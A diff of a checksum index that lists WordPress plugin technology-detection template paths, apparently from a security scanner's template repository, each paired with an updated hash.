-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:09ec8b79f9de141a83598f4e55ef0722d0c6c743 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:3e4f4904e60ae5fc2c007349705bdb1e9a5a5469 -http/technologies/wordpress/plugins/coblocks.yaml:48726c9c542ab6495e1e672a8eefad76b1b38243 -http/technologies/wordpress/plugins/code-snippets.yaml:64118e72dbddfb61b7eb960c09846f4479e6e447 -http/technologies/wordpress/plugins/coming-soon.yaml:b435b10eeee22da82f92e7019a573f296330882a -http/technologies/wordpress/plugins/complianz-gdpr.yaml:8b839792831a2c9c0095ce65e4b00ac6f93af10c -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:d59035b80834fd312be529a2aee0099d813ff51f -http/technologies/wordpress/plugins/contact-form-7.yaml:fecc3da4d9b86091abbbe23a71f45fcf771c3039 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dbd3a89c1a074953d10f09e0b2a51551b8249e58 -http/technologies/wordpress/plugins/cookie-law-info.yaml:3e5d8a0057ff25efc1ef2f917e05e23d4034b080 -http/technologies/wordpress/plugins/cookie-notice.yaml:7bf098e4c75409c50a3fe2e46bc39a303aa3c3aa -http/technologies/wordpress/plugins/copy-delete-posts.yaml:e74b9a9284f6c91f6a3c0e8bed9d2bef07aa9537 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:81e5e5ee5c54e9fded9421e6dc10e7f3501fe543 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:7b258b4d71e3c588e18511737e39cf12332b46cd -http/technologies/wordpress/plugins/custom-css-js.yaml:d9e63aa88e33aa0dd53763dbfaa051806ecfc707 -http/technologies/wordpress/plugins/custom-fonts.yaml:1be1de13977630f1bd57bdbd8c746c5e4f3df7c7 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:348080487d823302e9be0383a62fd78b607c9feb -http/technologies/wordpress/plugins/disable-comments.yaml:d1324ac0b8bda7657d83cb9d7b6465015fe1c6ee -http/technologies/wordpress/plugins/disable-gutenberg.yaml:153f0bd6af6502c610ef69ddc10794e3e2cb67cd -http/technologies/wordpress/plugins/duplicate-page.yaml:12ebf8529d3e7272b60926cf6be3dc38f692ecd1 -http/technologies/wordpress/plugins/duplicate-post.yaml:a76fc7ad257bccfbb9e110380b7ec13e1970bbc5 -http/technologies/wordpress/plugins/duplicator.yaml:737ae1b94336ce12a6643e4328e2953a4e0e6afc -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:873f4ec122d70d01a8625a7cc2609377d1bd8342 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:95d81a84f118874cf0851da3f768f62d534e4d33 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7e16d0e03302d2603da11109c4135dc0acf1822b -http/technologies/wordpress/plugins/elementor.yaml:491fac0b81a64b11140992beb244bccf7181c35c -http/technologies/wordpress/plugins/elementskit-lite.yaml:6a29fb903e1128f10b1ff26ae107f6246e129a6d -http/technologies/wordpress/plugins/enable-media-replace.yaml:aba426512690db2f47b07515bd112e30ddbf753b -http/technologies/wordpress/plugins/envato-elements.yaml:e40b280d69223f57b3b97dab6d362491723effca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:4c5e6aee3f20ec4fea7e802a0b6e34fdcce286b9 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:cc2e897214626a4234480952cab9339523e60151 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:1a6ab177428c061fc07c5c47596da050ad39486a -http/technologies/wordpress/plugins/fast-indexing-api.yaml:1ee52cf84d45a9bb1dd616b18966fca676e4ddde -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c950ccb4b360864ed106a4d25bb5d4770ac93458 -http/technologies/wordpress/plugins/flamingo.yaml:1bd1285f2411f0ed75c64b775d25c62c42dd131e -http/technologies/wordpress/plugins/fluentform.yaml:f8172f4af850d06fdfcc1bdd7de51612c9942f3c -http/technologies/wordpress/plugins/font-awesome.yaml:198615574b193f7ed7791e491870ab42c0b3e3b6 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6cecd8c3c1c422d2c63f5f8ea873ba73511a2f7a -http/technologies/wordpress/plugins/formidable.yaml:b8b5f9c09726fbd1439b7142baa0f86dcabb97b3 -http/technologies/wordpress/plugins/forminator.yaml:5bf375bc0a4da458e871fb47fe38a5f7095be8a9 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:c472292f6fe36e9ea57802d4f0bedef89e1c51bf -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2cf1904da3bb2b487f693a3e36d42f58282c391b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ee89d448c9da169a01877c44ec4c6a4b051e7043 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:26ecf9fc2b07c3721bb3c68fe3842725d15a0e8c -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:50e59218e437d3ca85a65fdebe130d95f417fc9f -http/technologies/wordpress/plugins/google-site-kit.yaml:63af18b6ef4b23834ea5dc823a1928f915d0adec -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:e5d41a5b72300261587d91a24fb5d5005ce110ff -http/technologies/wordpress/plugins/gtranslate.yaml:7a3af2b2031d60e2854ca027bbd2eaeaf0342e55 -http/technologies/wordpress/plugins/gutenberg.yaml:32e5a829c4ac712281405af99c4e7cb354970302 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:02cbd3b19ed597598fea5038f95df3b9aa846298 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:84becbc762eb95efbfda0d93c0143eaa5199fe8c -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f00805f28fd5cf4152a11e51a2ef8ecf416b623 -http/technologies/wordpress/plugins/header-footer.yaml:7d274575329c811f086d9300939cbe812f02b8c0 -http/technologies/wordpress/plugins/health-check.yaml:4353086cc7b50dcf484f41d13921fca77351ba26 -http/technologies/wordpress/plugins/hello-dolly.yaml:10510fd54d122fd9325f9bf6cfa9ec9168279063 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:d8ce07bf44bcead103c1d5b2fb27b101ea57b424 -http/technologies/wordpress/plugins/hostinger.yaml:aa2b62c0ce10c9a1aebc7f88ff4fdaeb4882e5e3 -http/technologies/wordpress/plugins/image-optimization.yaml:217a5a007a97dd8fc86ce582f78e2e0e47a189f0 -http/technologies/wordpress/plugins/imagify.yaml:eeb3548eae665a93c7952ed30099ae8fde404299 -http/technologies/wordpress/plugins/imsanity.yaml:cbc7426a329296f82a1acc8773b2bd2933119174 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:32299a9e7ff53ae6ec220a2eff7b71afc8667103 -http/technologies/wordpress/plugins/instagram-feed.yaml:d465693c6685b91b263dc675dda5c85b106422ca -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d6460adaab2f2b574db4c8205b32330a058f9b39 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:0a0fb26b50531e3c599a4e71578a650a1565ce88 -http/technologies/wordpress/plugins/jetpack.yaml:727e18630b717fca79dfb844c3fd9003a42e0d84 -http/technologies/wordpress/plugins/kadence-blocks.yaml:da282fd4bc52389fc5861a64fdda6c8d7c699e51 -http/technologies/wordpress/plugins/kirki.yaml:ee4bf55b20ba76249be63aed87124ac64d614571 -http/technologies/wordpress/plugins/leadin.yaml:b504ef71d6d7e98e80b9ba72a65356d5edae3d1f -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:de3538623c0381893be9f04e1ad2cbf169cc222e -http/technologies/wordpress/plugins/limit-login-attempts.yaml:ca8c2c8f3e74535f8bd4f304ca5f6fbf8d9fe3e4 -http/technologies/wordpress/plugins/litespeed-cache.yaml:2eeb36ec97f755a0452a3d7aed525276e6ee6af7 -http/technologies/wordpress/plugins/loco-translate.yaml:54675c250c367fc4fa4a435e9f4f42c16cc91cd0 -http/technologies/wordpress/plugins/loginizer.yaml:868c23bc4020a4a9e71434f254927ae2d9f1e344 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:986e9fae35cc4e51b075aecbf4d46b6e14a494dc -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a49ba8819d738e309e1b09e384ddd2e226cf605b -http/technologies/wordpress/plugins/mailpoet.yaml:36b8d097248299698a2a97b8b30d452c18b10900 -http/technologies/wordpress/plugins/maintenance.yaml:ca01ab9f9ec329ca076fb46cb0de2fde9f9073ba -http/technologies/wordpress/plugins/mainwp-child.yaml:0b3f1c856cf1ddec2f3fd31b705d0b04a172c958 -http/technologies/wordpress/plugins/malcare-security.yaml:7bb6fd19d16635f20c046f636187e6c9d2491d29 -http/technologies/wordpress/plugins/megamenu.yaml:5fd772d7f63ccec1a75bf35b8cb1601f95531cfa -http/technologies/wordpress/plugins/members.yaml:42cfec8382ff138336ed5186adba2366ea106492 -http/technologies/wordpress/plugins/meta-box.yaml:c19971f5871d012b9352dd5df4f8918589209013 -http/technologies/wordpress/plugins/metform.yaml:48b0877d44f6a3654bc69afd2db435b3510872a7 -http/technologies/wordpress/plugins/ml-slider.yaml:d6e4259b94c7609245d781db51020a7bcdd5c746 -http/technologies/wordpress/plugins/newsletter.yaml:e162970b87a6981e14d63a6992d321e612a7f783 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a97e3834b12dcf307e6595200dbff12a93677987 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:8f01cbd8f5d80c4d2139b766e2144bb2c7d65d45 -http/technologies/wordpress/plugins/ninja-forms.yaml:1b77045e52afbd382f110abeeae8ffaa73e25cc8 -http/technologies/wordpress/plugins/ocean-extra.yaml:ff55747b1d481b0b35cbdebe92b5d8ac970e7744 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:50793d62f4d39740b4ca528603143383e8f41f71 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:e6ef59f7a526c359f30a59b13137097fbd8847a2 -http/technologies/wordpress/plugins/optinmonster.yaml:8518622de2f0cb6b2081a3879369f5f97ee206b9 -http/technologies/wordpress/plugins/otter-blocks.yaml:061ba0e795da66af647ccb0dec59681a7a30e098 -http/technologies/wordpress/plugins/password-protected.yaml:ad58ac9efaf70da0b09644804935893b9b40c939 -http/technologies/wordpress/plugins/pdf-embedder.yaml:d4f21f680453cd5b47ad0e5555256fa5fa83d81f +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:11dd6a395a53fc5517b30c0624dd9b1669e5346e -http/technologies/wordpress/plugins/pixelyoursite.yaml:077f7614026d1205187d51bbdcef58e8a3db6ac0 -http/technologies/wordpress/plugins/polylang.yaml:0fc002ec70d3298206670bafe4bc48e55670aa5c +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:cbe0f76128a5a5ced48cfc77076a4c9ee1c35822 -http/technologies/wordpress/plugins/post-smtp.yaml:a62a68ab9303f483e86b071670bbd510ee37802d -http/technologies/wordpress/plugins/post-types-order.yaml:8211ba9701976b5e98ec775e89d5dfd20fd92a17 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c942200d07dc080be326d618e0a58b2fe7b66730 -http/technologies/wordpress/plugins/pretty-link.yaml:329473b32f16dafe4a62d9ebca2a96eb70c6e91a -http/technologies/wordpress/plugins/really-simple-captcha.yaml:cba5f050ebd17e6c968d545f987cc1fcdbc52e72 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bfbaff85043768e49dcb88ffde2e450f50136f1a -http/technologies/wordpress/plugins/redirection.yaml:7a21fab3f2e5a801dbdd07ea7e51b9d47b748205 -http/technologies/wordpress/plugins/redux-framework.yaml:e43a6587dd96b8f1f86ce35d2f39dc796bceff49 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:5225739ab5b8fc51341dec0d467bc7856c006e64 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:fa67345e6cc53122501a62d2619d4b516f2676ce -http/technologies/wordpress/plugins/safe-svg.yaml:0e22cb85cce8330361a48f5c0329c12ec51af2f1 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:7bf5ad0edf0fff0bb88f0c6e87fc31af67df89ff -http/technologies/wordpress/plugins/sg-cachepress.yaml:352b201121a8673e445736b95ceb2df20c8a10fc -http/technologies/wordpress/plugins/sg-security.yaml:51236a8025498fbf82d039fa748de5e45bf19811 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:532041918512da4c2edbb61548f59aacdb439a19 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:c96f8367ff2cd6a6e712364dbff7f984b7ade796 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:455deb7e048121d78659b631710a852751b8ac40 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:978f93a7817ae16c31d0b1338dc351a44943f8ed -http/technologies/wordpress/plugins/siteorigin-panels.yaml:0d3ccf351203eeb1e02ba54e0eee315b878aae71 -http/technologies/wordpress/plugins/smart-slider-3.yaml:3a3a13decb3b4884909b47e412dc122cb5ecae6e -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9bf25572295f571edaa4f7f50764ac89c4e69c09 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:2fb3b374247ac69a55cc576fe6fbb295173992cd -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:1a010e2ad1675865003a59ff090f4eca934a0589 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:56695949b19866f10891acaf7a47c027417d02c7 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 